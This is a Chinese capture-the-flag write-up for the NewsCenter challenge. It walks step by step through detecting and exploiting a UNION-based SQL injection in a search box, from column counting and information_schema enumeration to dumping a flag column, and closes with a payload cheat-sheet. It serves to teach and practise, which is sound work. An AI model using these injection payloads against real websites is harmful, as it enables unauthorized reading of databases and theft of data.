攻防世界-NewsCenter

题目信息

分析过程

题目打开是有个输入框可以用来输入搜索信息,初步判断是个sql注入的题目。接下来判断能否进行sql注入:

输入 hi,有搜索结果,如下图:
输入hi',无结果,如下图:
初步判定是hi'后面还有单引号,导致重复输入导致的,(单引号与服务端代码中的'形成闭合,将我们输入的字符串hello包裹,服务端代码后面多出来一个'导致语法错误,而加入#将后面的'注释掉之后不会报错,可确定为字符型SQL注入。)为了证明判断结果,输入hi'#(意思#后面的内容都要呗注释掉),结果如下图:
证明确实存在sql注入的问题,解题思路为朝着sql注入的方向努力。

解题过程

  1. 判断字段的个数:使用order by 确定。原理:order by根据前面查询内容的属性对查询数据进行分类,order by 后面的内容可以少于前面查询的属性数,但是不能多于查询的属性数
    hi' order by 1#:
    hi' order by 2#
    hi' order by 3#
    hi' order by 4#

证明是三个字段。

  1. 使用union联合表法注入。

输入hi' union select 1,2,3#:
只有2,3列回显,ps:

输入:

复制代码
hi' union select 1,#
hi' union select 1,2#
hi' union select 2,3#

都无法正常回显。

  1. 使用

    hi' union select 1,database(),version()#

查询数据库版本和名称

可以看到数据库名称是news,数据库版本是5.5.61。版本是5.0版本以上,我们可以通过系统的数据库来获取很多想要的信息。

其中,database()的位置可以是任意的:(只要不是1就行,因为1不回显)

4.获取表名

hi' 复制代码

结果如下:

或者

复制代码
hi' union select 1,2,table_name from information_schema.tables where table_schema='news'#

结果如下:
得到表名news、secret_table

  1. 获取字段名:

    hi' union select 1,2,column_name from information_schema.columns where table_name='secret_table' #

结果如下:
得到字段名id、fl4g;需要获得fl4g的字段内容

  1. 获得fl4g的字段内容,输入:

    hi' union select 1,id,fl4g from news.secret_table #

获得flag:

相关知识

  1. 5.0以上的版本自带information_schema数据库,这数据库下面又有schemata、tables、columns,这些表中又有(schema_name)、(table_name、table_schema)、(table_schema、table_name、column_name)字段。
    2. 使用或者不使用group_concat都可以,相关用法如下:https://www.jb51.net/article/2844934ju.htm
    3.总结:
    查表:hi' union select 回显字段1,回显字段2,group_concat(table_name) from information_schema.tables where table_schema='news',在三个回显字段中选一个就行。
    查列:hi' union select 回显字段1,回显字段2,group_concat(column_name) from information_schema.columns where table_schema='news' #看表中有哪些列,也就是表含有哪些信息。
    查字段:hi' union select 回显字段1,回显字段2,fl4g from secret_table#,就是把表中的列里的具体数字搞出来。
相关推荐
想你依然心痛17 分钟前
HarmonyOS 6(API 23)实战:基于悬浮导航、沉浸光感与HMAF的“代码哨兵“——AI智能体代码安全审计平台
人工智能·安全·harmonyos·智能体
ze^01 小时前
Day01 Web应用&架构搭建&域名源码&站库分离&MVC模型&解析受限&对应路径
安全·web安全·架构·mvc·安全架构
轻口味1 小时前
HarmonyOS 6.1 全栈实战录 - 09 极光底座:ArkWeb 6.1 性能、安全与视觉插帧全特性深度实战
pytorch·安全·harmonyos
Paranoid-up1 小时前
安全启动和安全固件更新(SBSFU)11:保护链:开发 / 量产 / SECURE_LOCK 三种模式
安全·iap·安全启动·安全升级·sbsfu
TOWE technology2 小时前
同为科技雷电防护产品,构筑全场景电气安全防线
网络·科技·安全·防雷产品·防雷工程·防雷施工·防雷设计
2601_957787582 小时前
短视频矩阵风控对抗技术:星链引擎的账号安全防护体系深度解析
线性代数·安全·矩阵
@insist1233 小时前
信息安全工程师-测评核心知识框架与关键流程(下篇)
网络·安全·软考·信息安全工程师·软件水平考试
DianSan_ERP3 小时前
抖店订单接口中消费者信息加密解密机制与安全履约全解析
前端·网络·数据库·后端·安全·团队开发·运维开发
侃谈科技圈3 小时前
硬件确认与助记词备份正在成为钱包安全管理的重要环节
安全·区块链
JiaWen技术圈6 小时前
FRP TLS 安全传输的配置指南
安全